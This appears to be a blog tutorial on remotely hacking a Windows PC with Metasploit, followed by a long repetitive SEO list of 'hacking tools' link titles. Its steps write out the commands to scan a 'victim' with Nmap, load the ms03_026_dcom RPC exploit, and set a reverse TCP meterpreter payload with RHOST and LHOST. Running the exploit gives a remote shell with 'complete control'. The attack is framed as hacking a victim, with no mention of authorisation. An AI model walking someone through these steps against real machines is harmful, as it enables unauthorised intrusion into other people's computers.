Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.
SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?
REQUIREMENTS
Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
- Linux Machine (Kali Linux or BackTrack 5)
- Metasploit (Built in the mentioned Linux OS)
- Windows PC victim
STEPS TO FOLLOW
Let's move on how to perform the complete attack.
- Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
- We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
- After the initialization of msfconsole, standard checks, we will see the window like below.
- Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
- Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
- As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
- Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
- Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
- Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
- Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
- Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server. To find out all the commands to play with the victim machine, we can use the "help".
We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.
More information
- Hackers Toolbox
- Hacking Tools For Windows
- Hack And Tools
- Hackrf Tools
- How To Make Hacking Tools
- Pentest Tools Kali Linux
- Hacking Tools For Windows Free Download
- Hacker Tools 2019
- Hacker Tools Free Download
- Hacker Techniques Tools And Incident Handling
- Best Hacking Tools 2020
- Hack Tools Download
- Hacker Tools Hardware
- Pentest Tools Port Scanner
- New Hacker Tools
- Pentest Tools Nmap
- Pentest Tools Url Fuzzer
- Hacking Tools Download
- Hacker Tools Linux
- Hacking Tools For Kali Linux
- Tools For Hacker
- Underground Hacker Sites
- Pentest Tools Review
- Pentest Tools Website Vulnerability
- New Hacker Tools
- Hack Tools
- Pentest Automation Tools
- Hacker Tools Hardware
- Pentest Tools Website Vulnerability
- Pentest Tools Android
- Best Pentesting Tools 2018
- Computer Hacker
- Hak5 Tools
- Nsa Hacker Tools
- Hak5 Tools
- Hacker Tools Hardware
- Hak5 Tools
- Hacking Tools Online
- Android Hack Tools Github
- Hacking Tools For Beginners
- Hack Tools Online
- Pentest Tools Free
- Hack Tools Pc
- Tools 4 Hack
- Pentest Tools For Android
- Tools For Hacker
- Hack Tools For Ubuntu
- Pentest Automation Tools
- Hack Rom Tools
- Hacking Tools Github
- Pentest Tools For Android
- Best Hacking Tools 2020
- Hacker Tools For Mac
- Blackhat Hacker Tools
- Hacker Tools Github
- How To Install Pentest Tools In Ubuntu
- Hacker Tools Software
- Github Hacking Tools
- Best Hacking Tools 2019
- Physical Pentest Tools
- Hacking Tools For Kali Linux
- Hack Tool Apk
- Pentest Tools For Windows
- Hacking Tools For Mac
- Hackers Toolbox
- Hacking Tools Windows 10
- Hack Tools Mac
- Pentest Automation Tools
- Hacker Security Tools
- What Are Hacking Tools
- Tools 4 Hack
- Blackhat Hacker Tools
- Underground Hacker Sites
- Best Pentesting Tools 2018
- Hacker Tools 2019
- Hacker Tools For Pc
- Hak5 Tools
- Pentest Tools
- Pentest Tools Nmap
- Pentest Tools Bluekeep
- Android Hack Tools Github
- Hak5 Tools
- Hacking Tools Pc
- World No 1 Hacker Software
- Hacking Tools And Software
- Hack Tools For Ubuntu
- Top Pentest Tools
- Pentest Tools Download
- Blackhat Hacker Tools
- Hacker Tools Linux
- Nsa Hacker Tools
- Hacking Tools For Games
- Hacker Tools For Windows
- Hack App
- Pentest Tools Github
- Ethical Hacker Tools
- Android Hack Tools Github
- Pentest Tools List
- Nsa Hacker Tools
- Hacker
- Best Hacking Tools 2019
- Hack Tools Mac
- Hacker Tools
- Hacker Hardware Tools
- Hacker Tools Online
- Hack Tools
- Wifi Hacker Tools For Windows
- Hack Tools Pc
- Hacker Techniques Tools And Incident Handling
- Pentest Tools Find Subdomains
- Hacker Tools Hardware
- Pentest Recon Tools
- Hacking Tools Name
- Hacking Tools Online
- Hacker Tools Hardware
- New Hacker Tools
- Hacking Tools For Games
- Hacker Techniques Tools And Incident Handling
- Hacker Tools For Mac
- Hacker Tools For Ios
- Hacker Tools Software
- Hacker Techniques Tools And Incident Handling
- Hack Tool Apk No Root
- Pentest Tools For Ubuntu
- How To Install Pentest Tools In Ubuntu
- How To Install Pentest Tools In Ubuntu
- Pentest Tools Download
- Hack Tools
- Hacker Security Tools
- Hacking Tools Hardware
- Hacking App
- Hack Rom Tools
- Hacking App
- Hacking Tools For Windows
- Pentest Box Tools Download
- Hacker Tools
- Hacking Tools Free Download
- Hacking Tools Name
- Physical Pentest Tools
- Pentest Tools Online
- Hack Tools For Ubuntu
- Hack Tools
- Hacking App
- Hacker Tools List
- Growth Hacker Tools
- Pentest Tools Open Source
- Android Hack Tools Github
No hay comentarios:
Publicar un comentario